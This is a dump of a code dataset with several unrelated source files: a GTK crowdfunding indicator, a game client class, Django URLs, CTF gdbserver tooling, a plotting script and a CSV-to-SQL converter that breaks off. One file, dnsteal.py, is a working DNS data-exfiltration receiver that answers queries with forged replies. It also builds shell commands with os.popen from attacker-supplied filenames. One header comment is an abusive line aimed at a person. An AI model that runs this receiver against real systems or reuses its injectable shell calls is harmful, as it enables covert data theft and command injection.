repo_name (stringlengths 6-61) | path (stringlengths 4-230) | copies (stringlengths 1-3) | size (stringlengths 4-6) | text (stringlengths 1.01k-850k) | license (stringclasses, 15 values) | hash (int64, -9,220,477,234,079,998,000 to 9,219,060,020B) | line_mean (float64, 11.6-96.6) | line_max (int64, 32-939) | alpha_frac (float64, 0.26-0.9) | autogenerated (bool, 1 class) | ratio (float64, 1.62-6.1) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bx5974/desktop-mirror | ubuntu-edge-indicator.py | 2 | 1976 | #!/usr/bin/python
from gi.repository import Gtk, GObject
from gi.repository import AppIndicator3 as appindicator
import urllib, re, os, time, datetime
def openit(*args):
os.system("xdg-open http://www.indiegogo.com/projects/ubuntu-edge")
# both UTC
STARTTIME = datetime.datetime(2013, 7, 22, 15, 0, 0)
ENDTIME = datetime.datetime(2013, 8, 22, 7, 0, 0)
def update(*args):
# screen scraping of glory
fp = urllib.urlopen('http://www.indiegogo.com/projects/ubuntu-edge')
data = fp.read()
mtch = [x for x in data.split('\n') if '$2,' in x and 'amount' in x and 'medium' in x]
if len(mtch) != 1:
ind.set_label("?????", "$32.00m")
return True
val = re.search("\$([0-9,]+)<", mtch[0])
val = val.groups()[0]
val = val.replace(",", "")
val = int(val)
mval = val / 1000000.0
ind.set_label("$%0.2fm" % mval, "$32.0m")
lst.get_child().set_text("Last updated: %s" % time.strftime("%H:%M"))
now = datetime.datetime.utcnow()
done = now - STARTTIME
togo = ENDTIME - now
done_seconds = (done.days * 24 * 60 * 60) + done.seconds
togo_seconds = (togo.days * 24 * 60 * 60) + togo.seconds
ratio = float(togo_seconds) / done_seconds
projected = val + (ratio * val)
mprojected = projected / 1000000.0
prj.get_child().set_text("Projected: $%0.2fm" % mprojected)
return True
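# Worked example of the projection above (illustrative numbers only): if the
# campaign is exactly halfway through (togo_seconds == done_seconds, so
# ratio == 1.0) and val is 8,000,000, then projected = 8,000,000 + 1.0 * 8,000,000
# = 16,000,000 and the menu item reads "Projected: $16.00m".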
if __name__ == "__main__":
ind = appindicator.Indicator.new("ubuntu-edge-indicator", "",
appindicator.IndicatorCategory.APPLICATION_STATUS)
ind.set_status(appindicator.IndicatorStatus.ACTIVE)
ind.set_label("$$$$$", "$32.0m")
menu = Gtk.Menu()
opn = Gtk.MenuItem("Open IndieGogo")
menu.append(opn)
lst = Gtk.MenuItem("Last updated: ?????")
menu.append(lst)
prj = Gtk.MenuItem("Projected: ?????")
menu.append(prj)
menu.show_all()
opn.connect("activate", openit)
ind.set_menu(menu)
GObject.timeout_add_seconds(300, update)
update()
Gtk.main()
| apache-2.0 | 5,578,420,800,267,353,000 | 32.491525 | 90 | 0.616903 | false | 3.00761 | false | false | false |
DedMemez/ODS-August-2017 | building/DistributedToonHouseInterior.py | 1 | 1531 | # Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.building.DistributedToonHouseInterior
from direct.distributed.DistributedObject import DistributedObject
from toontown.building.HouseInterior import HouseInterior
from toontown.toon.DistributedNPCToonBase import DistributedNPCToonBase
from ZoneBuilding import ZoneBuilding
class DistributedToonHouseInterior(DistributedObject, HouseInterior, ZoneBuilding):
def __init__(self, cr):
DistributedObject.__init__(self, cr)
HouseInterior.__init__(self)
self.ownerId = -1
self.director = None
self.posIndices = []
return
def getBlock(self):
return self.block
def announceGenerate(self):
DistributedObject.announceGenerate(self)
self.setup()
self.setPosIndices(self.posIndices)
def disable(self):
HouseInterior.disable(self)
DistributedObject.disable(self)
def getInteriorObject(self):
return self
def setPosIndices(self, posIndices):
self.posIndices = posIndices
if not self.interior:
return
for i, posHpr in enumerate(self.posIndices):
origin = self.interior.find('**/npc_origin_%s' % i)
if origin.isEmpty():
origin = self.interior.attachNewNode('npc_origin_%s' % i)
origin.setPosHpr(*posHpr)
for npcToon in self.cr.doFindAllInstances(DistributedNPCToonBase):
npcToon.initToonState() | apache-2.0 | 5,008,071,412,437,827,000 | 33.651163 | 105 | 0.664272 | false | 3.966321 | false | false | false |
nemanjan00/dnsteal | dnsteal.py | 1 | 2754 | #!/usr/bin/env python
#####################
import socket
import sys
import binascii
import time
import random
import hashlib
import zlib
import os
class DNSQuery:
def __init__(self, data):
self.data = data
self.data_text = ''
tipo = (ord(data[2]) >> 3) & 15 # Opcode bits
if tipo == 0: # Standard query
ini=12
lon=ord(data[ini])
while lon != 0:
self.data_text += data[ini+1:ini+lon+1]+'.'
ini += lon+1
lon=ord(data[ini])
def request(self, ip):
packet=''
if self.data_text:
packet+=self.data[:2] + "\x81\x80"
packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts
packet+=self.data[12:] # Original Domain Name Question
packet+='\xc0\x0c' # Pointer to domain name
packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP
return packet
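# Illustrative note on the forged answer built above: the final line packs the
# dotted quad into the 4-byte RDATA of the A record, e.g. ip = '10.0.0.1'
# becomes '\x0a\x00\x00\x01'. Any name the victim resolves is therefore
# answered with a single A record pointing at return_ip, TTL 0x3c (60 seconds).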
def banner():
print "\033[1;31m",
print """
___ _ _ ___ _ _
| \| \| / __| |_ ___ __ _| |
| |) | .` \__ \ _/ -_) _` | |
|___/|_|\_|___/\__\___\__,_|_|
-- https://github.com/nemanjan00/dnsteal.git --\033[0m
Stealthy file extraction via DNS requests
"""
if __name__ == '__main__':
try:
ip = sys.argv[1]
ipr = sys.argv[2]
ipr = socket.gethostbyname(ipr)
except:
banner()
print "Usage: %s [listen_address] [return_ip]"
exit(1)
banner()
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind((ip,53))
print '\033[1;32m[+]\033[0m DNS listening on %s:53' % ip
print "\033[1;32m[+]\033[0m Now on the victim machine, use the following command:"
while 1:
try:
data, addr = udp.recvfrom(1024)
p=DNSQuery(data)
udp.sendto(p.request(ipr), addr)
print 'Request: %s -> %s' % (p.data_text, ipr)
filename = ""
data = p.data_text
data = data.replace("/", "")
data = data.replace("\\", "")
data = data.split(".")
for index,item in enumerate(data):
if(index < len(data) - 3):
if(index == 1):
filename = item
if(index > 1):
filename += "." + item
os.popen("mkdir -p data")
filename = "data/"+filename
if(data[0] != "gunzip"):
f = open(filename, "a")
f.write(binascii.unhexlify(data[0]))
f.close()
else:
os.popen("mv " + filename + " " + filename + ".ori ; cat " + filename + ".ori | gunzip > " + filename)
except Exception:
pass
| gpl-2.0 | -8,039,776,869,524,454,000 | 24.036364 | 125 | 0.503268 | false | 3.158257 | false | false | false |
ubergrape/django-abo | abo/urls.py | 1 | 1114 | from django.conf.urls import patterns, url, include
from abo.utils import import_backend_modules
backend_specific_urls = []
for backend_name, urls in import_backend_modules('urls').items():
simple_name = backend_name.split('.')[-1]
backend_specific_urls.append(url(r'^%s/' % simple_name, include(urls)))
from .views import (
CancelView,
ChangeCardView,
ChangePlanView,
HistoryView,
SubscribeView,
SubscriptionSuccessView,
SubscriptionFailureView
)
urlpatterns = patterns('',
url(r"^subscribe/$", SubscribeView.as_view(), name="abo-subscribe"),
url(r"^subscription/(?P<pk>\d+)/success/$", SubscriptionSuccessView.as_view(), name="abo-success"),
url(r"^subscription/(?P<pk>\d+)/failure/$", SubscriptionFailureView.as_view(), name="abo-failure"),
url(r"^change/card/$", ChangeCardView.as_view(), name="abo-change_card"),
url(r"^change/plan/$", ChangePlanView.as_view(), name="abo-change_plan"),
url(r"^cancel/$", CancelView.as_view(), name="abo-cancel"),
url(r"^history/$", HistoryView.as_view(), name="abo-history"),
*backend_specific_urls
)
| bsd-3-clause | 8,146,168,260,789,196,000 | 34.935484 | 103 | 0.680431 | false | 3.448916 | false | false | false |
google/google-ctf | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gdbproc.py | 1 | 10484 | #!/usr/bin/env python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import os
import threading
import re
import functools
import codecs
import psutil
import asyncio
import asyncio.subprocess
def re_findall(q, s):
idx = 0
while True:
match = re.search(q, s[idx:])
if not match:
break
yield idx+match.start()
idx += match.start()+1
def string_findall(q, s):
idx = 0
while True:
idx = s.find(q, idx)
if idx < 0:
break
yield idx
idx = idx+1
class GDBInterrupt(object):
def __init__(self):
pass
class GDBCommand(object):
def __init__(self, data, reply_queue = None):
self.data = data
self._reply_queue = reply_queue
def will_continue(self):
return self._reply_queue == None
async def reply(self, pkt):
if self._reply_queue:
await self._reply_queue.put(pkt)
class GDBError(object):
def __init__(self, msg):
self.msg = msg
class GDBReply(object):
def __init__(self, data):
self.data = data
def is_stop_reply(self):
return self.data.startswith(b'T')
class ExitMsg(object):
def __init__(self):
pass
def gdb_checksum(cmd):
checksum = functools.reduce(lambda csum, c: (csum+c)%256, cmd, 0)
return '{:02x}'.format(checksum).encode('ascii')
def gdb_encode(s):
out = b''
for c in s:
if c in b'#$}':
out += b'}'+bytes([c ^ 0x20])
else:
out += bytes([c])
return out
def gdb_decode(s):
out = b''
i = 0
while i < len(s):
c = s[i]
if c == ord('*'):
cnt = s[i+1] - 29
out += bytes([out[-1]]*cnt)
i += 2
elif c == ord('}'):
c = s[i+1]
c = bytes([c ^ 0x20])
out += c
i += 2
else:
out += bytes([c])
i += 1
return out
def gdb_format_cmd(s):
return b'$' + s + b'#' + gdb_checksum(s)
def gdb_make_pkt(data):
return gdb_format_cmd(gdb_encode(data))
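# Illustrative examples of the packet helpers above (values computed directly
# from the functions as written):
#   gdb_checksum(b'g')   == b'67'        (ord('g') == 0x67, summed mod 256)
#   gdb_make_pkt(b'g')   == b'$g#67'     (framed "read registers" command)
#   gdb_encode(b'a#b')   == b'a}\x03b'   ('#' escaped as '}' + (0x23 ^ 0x20))
#   gdb_decode(b'0* ')   == b'0000'      (run-length: ' ' is 0x20, 0x20 - 29 == 3 repeats)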
async def message_broker(pkt_queue, reply_queue, stop_reply_queue, gdbserver_stdin):
stopped = True
while True:
pkt = await pkt_queue.get()
if isinstance(pkt, GDBCommand):
if not stopped:
await pkt.reply(GDBError('not stopped'))
continue
gdbserver_stdin.write(gdb_make_pkt(pkt.data))
if pkt.will_continue():
stopped = False
continue
reply = await reply_queue.get()
await pkt.reply(reply)
elif isinstance(pkt, GDBInterrupt):
if stopped:
continue
gdbserver_stdin.write(b'\x03')
elif isinstance(pkt, ExitMsg):
return
else:
assert isinstance(pkt, GDBReply)
assert pkt.is_stop_reply()
assert not stopped
stopped = True
await stop_reply_queue.put(pkt)
async def packet_reader(pkt_queue, reply_queue, gdbserver_stdout):
while True:
next_char = await gdbserver_stdout.read(1)
if not next_char:
return
if next_char == b'+':
# ignore acks
continue
if next_char != b'$':
raise Exception('unexpected character (want $, got {!r})'.format(next_char))
pkt = b''
pkt += (await gdbserver_stdout.readuntil(b'#'))[:-1]
checksum = await gdbserver_stdout.read(2)
if not checksum == gdb_checksum(pkt):
raise Exception('wrong checksum {} vs {}, "{}"'.format(checksum, gdb_checksum(pkt), pkt))
reply = GDBReply(gdb_decode(pkt))
if reply.is_stop_reply():
await pkt_queue.put(reply)
else:
await reply_queue.put(reply)
class GDBProcess(object):
@staticmethod
async def create(argv, stop_reply_queue, env={}, log_fn=None):
self = GDBProcess()
self._bp_mutex = threading.Lock()
self._breakpoints = {}
self._log_fn = log_fn
self._p = await asyncio.create_subprocess_exec('gdbserver', '--once', '-', *argv, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE, preexec_fn=os.setsid, env=env, close_fds=True, bufsize=0)
self._pkt_queue = asyncio.Queue()
reply_queue = asyncio.Queue()
loop = asyncio.get_event_loop()
self._msg_broker = loop.create_task(message_broker(self._pkt_queue, reply_queue, stop_reply_queue, self._p.stdin))
self._pkt_reader = loop.create_task(packet_reader(self._pkt_queue, reply_queue, self._p.stdout))
self._proc_dir_fd = None
await self._start_no_ack()
return self
def breakpoints(self):
return list(self._breakpoints.keys())
def _log(self, msg):
if self._log_fn:
self._log_fn(msg)
async def release(self):
self._log('killing gdb process')
self._msg_broker.cancel()
self._pkt_reader.cancel()
os.killpg(os.getpgid(self._p.pid), 9)
await self._p.wait()
self._log('killed gdb process')
def open_proc_file(self, filename, mode='r'):
if not self._proc_dir_fd:
child_processes = psutil.Process(self._p.pid).children()
assert len(child_processes) == 1
child_pid = child_processes[0].pid
self._proc_dir_fd = os.open('/proc/{}/'.format(child_pid), os.O_PATH)
return open('/proc/self/fd/{}/{}'.format(self._proc_dir_fd, filename), mode)
def maps(self):
mappings = []
with self.open_proc_file('maps', 'r') as fd:
for line in fd.read().splitlines():
start,end,perm,name = re.match('^([0-9a-f]+)-([0-9a-f]+)\s+([rwx-]{3})p\s+[0-9a-f]+\s+[0-9a-f]{2}:[0-9a-f]{2}\s+[0-9a-f]+\s+(.*)$', line).groups()
start = int(start, 16)
end = int(end, 16)
size = end - start
mappings.append((start, size, perm, name))
return mappings
def search(self, q, qtype, max_match_count = 64):
mappings = self.maps()
matches = []
with self.open_proc_file('mem', 'rb') as mem_fd:
for start, size, perm, _ in mappings:
try:
mem_fd.seek(start)
except ValueError:
continue
except OverflowError:
self._log('overflow error')
continue
try:
data = mem_fd.read(size)
except IOError:
continue
try:
if qtype == 'regex':
search_fn = re_findall
else:
search_fn = string_findall
if qtype != 'string':
if qtype == 'char':
format_char = 'B'
elif qtype == 'short':
format_char = 'H'
elif qtype == 'int':
format_char = 'I'
else:
# long
format_char = 'Q'
q = struct.pack(format_char, int(q, 0))
for idx in search_fn(q, data):
match = data[idx:idx+max(32, len(q))]
matches.append([start+idx, match])
if len(matches) > max_match_count:
break
except ValueError:
continue
return matches
async def _write_pkt(self, cmd):
self._log('_write_pkt("{}")'.format(cmd))
reply_queue = asyncio.Queue(maxsize=1)
await self._pkt_queue.put(GDBCommand(cmd, reply_queue))
pkt = await reply_queue.get()
if isinstance(pkt, GDBError):
raise Exception(pkt.msg)
assert isinstance(pkt, GDBReply)
return pkt.data
async def _start_no_ack(self):
resp = await self._write_pkt(b'QStartNoAckMode')
if resp != b'OK':
raise Exception('NoAck response: "{}"'.format(resp))
self._p.stdin.write(b'+')
async def set_breakpoint(self, addr):
with self._bp_mutex:
if addr in self._breakpoints:
return
self._log('setting breakpoint at 0x{:x}'.format(addr))
hardware_breakpoint = len(self._breakpoints) < 4
command = 'Z1' if hardware_breakpoint else 'Z0'
resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii'))
if resp != b'OK':
raise Exception('Breakpoint error: "{}"'.format(resp))
self._breakpoints[addr] = hardware_breakpoint
async def remove_breakpoint(self, addr):
with self._bp_mutex:
hardware_breakpoint = self._breakpoints[addr]
command = 'z1' if hardware_breakpoint else 'z0'
resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii'))
if resp != b'OK':
raise Exception('Breakpoint error: "{}"'.format(resp))
del self._breakpoints[addr]
def _cont(self, mode):
self._pkt_queue.put_nowait(GDBCommand(b'vCont;'+mode))
def cont(self):
self._cont(b'c')
def step(self):
self._cont(b's')
def interrupt(self):
self._log('interrupting with 0x03')
self._pkt_queue.put_nowait(GDBInterrupt())
_REG_NAMES = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "rip", "eflags", "cs", "ss", "ds", "es", "fs", "gs"]
async def get_reg(self, name):
return (await self.get_regs())[name]
async def get_regs(self):
resp = await self._write_pkt(b'g')
data = codecs.decode(resp, 'hex_codec')
regs = {}
for i in range(len(GDBProcess._REG_NAMES)):
regs[GDBProcess._REG_NAMES[i]] = struct.unpack('Q', data[i*8:(i+1)*8])[0]
return regs
def read_mem(self, addr, count):
data = b''
with self.open_proc_file('mem', 'rb') as mem_fd:
try:
mem_fd.seek(addr)
data = mem_fd.read(count)
except:
try:
mem_fd.seek(addr)
for i in range(count):
data += mem_fd.read(1)
except:
pass
return data
async def main():
def log(msg):
print('[*] {}'.format(msg))
stop_queue = asyncio.Queue()
import time
print('creating process')
p = await GDBProcess.create(['/bin/sleep', '5'], stop_queue, log_fn=log)
print('process created')
await p.set_breakpoint(0x7ffff7dda886)
print('breakpoint at 0x7ffff7dda886')
p.cont()
await stop_queue.get()
for i in range(10):
p.step()
await stop_queue.get()
print(hex((await p.get_regs())['rip']))
p.cont()
await asyncio.sleep(0.1)
p.interrupt()
await stop_queue.get()
print(hex((await p.get_regs())['rip']))
await p.release()
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
| apache-2.0 | 7,243,329,813,426,914,000 | 27.961326 | 206 | 0.596433 | false | 3.297892 | false | false | false |
pymir3/pymir3 | scripts/plot/plot-feature-track.py | 1 | 1955 |
import argparse
import matplotlib.pyplot as plt
import numpy
import mir3.data.feature_track as feature_track
def plot(input_filename, output_filename, scale=None, dim=0, size=(3.45,2.0)):
"""Plots the a spectrogram to an output file
"""
s = feature_track.FeatureTrack().load(input_filename)
if s.data.ndim > 1:
d = s.data[:,dim]
else:
d = s.data
min_y = numpy.min(d)
max_y = numpy.max(d)
min_time = 0
max_time = float(len(d)) / s.metadata.sampling_configuration.ofs
ylabel = s.metadata.feature.split()[dim]
if scale is not None:
ylabel += ' ('
ylabel += str(scale)
ylabel += ')'
x_axis = numpy.array(range(len(d))) / \
float(s.metadata.sampling_configuration.ofs)
im = plt.plot(x_axis, d)
plt.xlabel('Time (s)')
plt.ylabel(ylabel)
fig = plt.gcf()
width_inches = size[0]#/80.0
height_inches = size[1]#/80.0
fig.set_size_inches( (width_inches, height_inches) )
plt.savefig(output_filename, bbox_inches='tight')
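# Example invocation (illustrative file names, not from the original project):
# plot the second dimension of a saved feature track at 5x3 inches with a
# labelled scale:
#   python plot-feature-track.py energy.ft energy.png --dim 1 --scale dB --width 5 --height 3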
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Plot a spectrogram')
parser.add_argument('infile', type=argparse.FileType('rb'),\
help="""Input spectrogram file""")
parser.add_argument('outfile',\
help="""Output figure file""")
parser.add_argument('--dim', type=int, default=0, help="""Dimension to
plot (used in multidimensional feature tracks)""")
parser.add_argument('--scale', default=None, help="""Scale to use in y-axis
label""")
parser.add_argument('--width', type=int, default=3.45, help="""Output width\
(inches).\
Default: 3.45 (one column)""")
parser.add_argument('--height', type=int, default=2.0, help="""Output\
height (inches).\
Default: 2.0""")
args = parser.parse_args()
plot(args.infile, args.outfile, args.scale, args.dim, \
(args.width, args.height))
| mit | -158,284,182,649,695,260 | 29.546875 | 80 | 0.611765 | false | 3.347603 | false | false | false |
stpettersens/ccsv2sql | ccsv2sql.jy.py | 1 | 4115 | #!/usr/bin/env jython
"""
ccsv2sql
Utility to convert a CSV file to a SQL dump.
Copyright 2015 Sam Saint-Pettersen.
Licensed under the MIT/X11 License.
Tweaked for Jython.
"""
import sys
import csv
import os
import re
import datetime
import getopt
signature = 'ccsv2sql 1.0.6 [Jython] (https://github.com/stpettersens/ccsv2sql)'
def displayVersion():
print('\n' + signature)
def displayInfo():
print(__doc__)
def ccsv2sql(file, out, separator, db, comments, verbose, version, info):
if len(sys.argv) == 1:
displayInfo()
sys.exit(0)
if file == None and out == None:
if verbose == False and version == True and info == False:
displayVersion()
elif verbose == False and version == False and info == True:
displayInfo()
sys.exit(0)
if out == None: out = re.sub('.csv', '.sql', file)
if file.endswith('.csv') == False:
print('Input file is not a CSV file.')
sys.exit(1)
if out.endswith('.sql') == False:
print('Output file is not a SQL file.')
sys.exit(1)
basename = os.path.basename(out)
table = re.sub('.sql', '', basename)
if separator == None: separator = ','
if comments == None: comments = True
fields = []
rows = []
csvfile = open(file, 'r')
f = csv.reader(csvfile, delimiter=separator)
headers = True
for row in f:
if headers:
fields = separator.join(row).split(separator)
headers = False
else:
rows.append(row)
csvfile.close()
dtable = 'DROP TABLE IF EXISTS `%s`;' % table
ctable = 'CREATE TABLE IF NOT EXISTS `%s` (\n' % table
insert = 'INSERT INTO `%s` VALUES (\n' % table
inserts = []
x = 0
for value in rows[0]:
key = fields[x]
fvalue = re.sub('\'|\"', '', value)
tvalue = re.sub('\.', '', fvalue)
if value.startswith('ObjectId('):
ctable += '`%s` VARCHAR(24),\n' % key
elif tvalue.isdigit() == False:
pattern = re.compile('\d{4}\-\d{2}\-\d{2}')
if pattern.match(value):
ctable += '`%s` TIMESTAMP,\n' % key
pattern = re.compile('true|false', re.IGNORECASE)
if pattern.match(value):
ctable += '`%s` BOOLEAN,\n' % key
else:
length = 50
if key == 'description': length = 100
ctable += '`%s` VARCHAR(%d),\n' % (key, length)
else: ctable += '`%s` NUMERIC(15, 2),\n' % key
x = x + 1
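    # Illustrative trace of the column-type inference above (hypothetical first-row
    # values): 'ObjectId(55b2a7e1...)' -> VARCHAR(24), 'true' -> BOOLEAN,
    # '12.50' (all digits once the dot is stripped) -> NUMERIC(15, 2), and other
    # non-numeric text -> VARCHAR(50), or VARCHAR(100) for a 'description' column.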
x = 0
for row in rows:
ii = ''
for value in rows[x]:
fvalue = re.sub('ObjectId|\(|\)|\'|\"', '', value)
tvalue = re.sub('\.', '', value)
if tvalue.isdigit() == False:
pattern = re.compile('\d{4}\-\d{2}\-\d{2}')
if pattern.match(value):
fvalue = re.sub('\T', ' ', fvalue)
fvalue = re.sub('\.\d{3}Z', '', fvalue)
fvalue = re.sub('\.\d{3}\+\d{4}', '', fvalue)
pattern = re.compile('true|false|null', re.IGNORECASE)
if pattern.match(value):
ii += '%s,\n' % fvalue.upper()
continue
ii += '\'%s\',\n' % fvalue
else: ii += '%s,\n' % fvalue
ii = ii[:-2]
inserts.append(insert + ii + ');\n\n')
ii = ''
x = x + 1
ctable = ctable[:-2]
ctable += ');'
if verbose:
print('\nGenerating SQL dump file: \'%s\' from\nCSV file: \'%s\'\n'
% (out, file))
f = open(out, 'w')
f.write('-- !\n')
if comments:
f.write('-- SQL table dump from CSV file: %s (%s -> %s)\n'
            % (table, file, out))
f.write('-- Generated by: %s\n' % signature)
f.write('-- Generated at: %s\n\n' % datetime.datetime.now())
if db != None: f.write('USE `%s`;\n' % db)
f.write('%s\n' % dtable)
f.write('%s\n\n' % ctable)
for insert in inserts:
f.write(insert)
f.close()
# Handle any command line arguments.
try:
opts, args = getopt.getopt(sys.argv[1:], "f:o:s:d:nlvi")
except:
print('Invalid option or argument.')
displayInfo()
sys.exit(2)
file = None
out = None
separator = None
db = None
comments = None
verbose = False
version = False
info = False
for o, a in opts:
if o == '-f':
file = a
elif o == '-o':
out = a
elif o == '-s':
separator = a
elif o == '-d':
db = a
    elif o == '-n':
comments = False
elif o == '-l':
verbose = True
elif o == '-v':
version = True
elif o == '-i':
info = True
else:
assert False, 'unhandled option'
ccsv2sql(file, out, separator, db, comments, verbose, version, info)
| mit | 1,921,077,044,573,538,000 | 20.102564 | 80 | 0.588092 | false | 2.712591 | false | false | false |
TomJKono/Misc_Utils | VCF_from_FASTA_2.py | 1 | 11371 | #!/usr/bin/env python
"""Updated version of VCF_from_FASTA.py that hopefully will simplify the
process of generating a VCF from Sanger reads aligned to a reference sequence.
Requires Biopython. Assumes the reference sequence is the first one in the
alignment. Takes one argument:
1) FASTA multiple sequence alignment"""
import sys
import re
from datetime import date
try:
from Bio import SeqIO
fa_in = sys.argv[1]
except ImportError:
sys.stderr.write('This script requires Biopython.\n')
sys.exit(1)
except IndexError:
sys.stderr.write(__doc__ + '\n')
sys.exit(2)
def extract_ref_coords(alignment, ref_idx=0):
"""Extract the name and the coordinates from the reference sequence of the
alignment. This expects the sequence to be named in SAM/BED region
format."""
ref = alignment[ref_idx]
chrom = ref.name.split(':')[0]
start = ref.name.split(':')[1].split('-')[0]
return (chrom, start)
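# Illustrative example (made-up region name): a reference record named
# 'chr2H:512345-513345' yields chrom='chr2H' and start='512345', matching the
# SAM/BED-style region naming the docstring assumes.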
def check_ref_gaps(alignment, ref_idx=0):
"""Check the reference sequence for end gaps. If we find any end gaps on
the left, we will throw an error because we cannot accurately calculate the
positions relative to reference. If we find them on the right, we will
throw a warning, but continue anyway."""
ref = alignment[ref_idx]
refseq = str(ref.seq)
left_gap = re.compile(r'^-+[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]')
right_gap = re.compile(r'[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]-+$')
if left_gap.match(refseq):
sys.stderr.write(
"""Error:
Reference sequence has end-gaps on the left. This will cause calculated
positions to be incorrect. Please remove the end gaps and re-run this script.
""")
sys.exit(10)
if right_gap.search(refseq):
sys.stderr.write(
"""Warning:
reference sequence has end-gaps on the right. This is not an error, but some of
the variants at the end of the alignment will not be placed on the reference
sequence. You may either remove the right end-gap or remove the variants from
the resulting VCF that occur in the end-gap.\n""")
return
def check_columns(alignment, ref_idx=0):
"""Check all of the columns of the alignment for those that are all gaps
or all N. Print a list of indices if it finds any."""
no_data = []
raw_aln = [list(s.seq) for s in alignment]
# Transpose it
t_aln = zip(*raw_aln)
refpos = 0
for index, column in enumerate(t_aln):
ref_base = column[ref_idx]
# Calculate the states that are present in this column
states = {s.upper() for s in column}
# Throw out gaps and Ns
states.discard('-')
states.discard('N')
# If there are no states left, then we append it to the list
if not states:
no_data.append((refpos+1, index+1))
if ref_base != '-':
refpos += 1
# Now, if no_data has values in it, then we will print them out here
if no_data:
message = """The following positions (1-based) were found to be either all gaps
or all N in your alignment:
{refpos}
in the reference sequence, or
{alnpos}
in the aligned sequences.\n""".format(
refpos=', '.join([str(i[0]) for i in no_data]),
alnpos=', '.join([str(i[1]) for i in no_data]))
sys.stderr.write(message)
sys.exit(2)
return
def extract_variants(alignment, ref_idx=0):
"""Extract the positions of SNPs and indels in the Sanger reads aligned to
the reference sequence."""
snp_pos = []
indel_pos = []
# First, convert the alignment to a list of lists, as opposed to a list
# of SeqRecord objects
raw_aln = [list(s.seq) for s in alignment]
# Transpose it so that we iterate over columns of the alignment
t_raw_aln = zip(*raw_aln)
# Start iterating across columns and saving positions of variant sites. We
# keep track of the reference base and only increment the position counter
# for when we see a non-gap character in the reference sequence.
offset = 0
for aln_pos, aln_column in enumerate(t_raw_aln):
# First, get the states that exist at this position. Transform them
# all to uppercase characters.
upper_col = [s.upper() for s in aln_column]
states = set(upper_col)
# Discard any 'N' bases
states.discard('N')
# And get the ref state
ref_state = aln_column[ref_idx]
# Use the ref state to get the alternate states
alt_states = states - set(ref_state)
# If there is a gap in this position, then we will append it to the
# list of indel positions
if '-' in states:
indel_pos.append((offset, aln_pos, ref_state, alt_states))
# Then, discard the gap character to look for SNPs
states.discard('-')
# If the length of the states is greater than 1, then we have a SNP
if len(states) > 1:
# We will calculate the following:
# Number of non-missing alleles
# Minor allele count
# Minor allele frequency
# The reference IS included in these calculations.
non_missing = [
base
for base
in aln_column
if base != '-'
                and base != 'N']
acs = [aln_column.count(x) for x in states]
afs = [float(c)/len(non_missing) for c in acs]
# Re-discard the gap character, just to be sure we do not count it
# as an alternate state
alt_states.discard('-')
snp_pos.append(
(offset, ref_state, alt_states, len(non_missing), min(acs),
min(afs)))
# If the reference sequence is not a gap, then we increment our offset
# counter.
if ref_state != '-':
offset += 1
return (snp_pos, indel_pos)
def collapse_indels(indels):
"""Collapse indels by identifying runs of consecutive integers and merging
those into a single entry."""
# Sort the indel bases by their aligned position
indel_srt = sorted(indels, key=lambda x: x[1])
# Make a list to hold our aggregated indels
agg_indel = []
# We will now iterate over adjacent records - if they are consecutive, then
# merge them. Else, break it and start a new record.
curr_indel = []
for ind, ind_adj in zip(indel_srt, indel_srt[1:]):
# Unpack the alleles. It's a little silly, but we have to cast the set
# to a list to subset it.
curr_ref = ind[2]
curr_alt = list(ind[3])[0]
adj_ref = ind_adj[2]
adj_alt = list(ind_adj[3])[0]
if not curr_indel:
curr_indel = [ind[0], ind[1], curr_ref, curr_alt]
# If the next position is not consecutive, append it and start over
if ind_adj[0] - ind[0] > 1:
agg_indel.append(curr_indel)
curr_indel = [ind_adj[0], ind_adj[1], adj_ref, adj_alt]
else:
curr_indel[2] += adj_ref
curr_indel[3] += adj_alt
# The way we are iterating through the indel list means that we will always
# leave off the last one. Append it after the loop finishes.
agg_indel.append(curr_indel)
return agg_indel
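# Illustrative example (hypothetical alignment): three consecutive gap columns at
# reference offsets 15, 16, 17 with reference bases A, C, G and a gapped alternate
# allele collapse into a single record [15, <aligned position>, 'ACG', '---'];
# adjust_indels() below then prepends the reference base at offset 14, anchoring
# the VCF entry one base upstream as the spec requires.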
def adjust_indels(indels, alignment, ref_idx=0):
"""Adjust the indel positions so that they are offset by one, as required
by the VCF spec. This is because the reported position must be the base
*before* any insertion/deletion polymorphism is observed."""
spec_indels = []
# Remove the gaps from the reference sequnce for getting the reference base
# of the indel
ref_seq = ''.join([base for base in alignment[ref_idx].seq if base != '-'])
for i in indels:
spec_pos = i[0] - 1
spec_ref = ref_seq[spec_pos]
spec_indel = [spec_pos, spec_ref + i[2], spec_ref + i[3]]
spec_indels.append(spec_indel)
return spec_indels
def print_vcf(snp_var, ind_var, refseq, offset):
"""Print a VCF from the calculated positions of the variants."""
# Define the VCF header
today = date.today().strftime('%Y%m%d')
vcf_header = """##fileformat=VCFv4.1
##fileDate={filedate}
##source=VCF_from_FASTA_2.py;Morrell Lab @ UMN
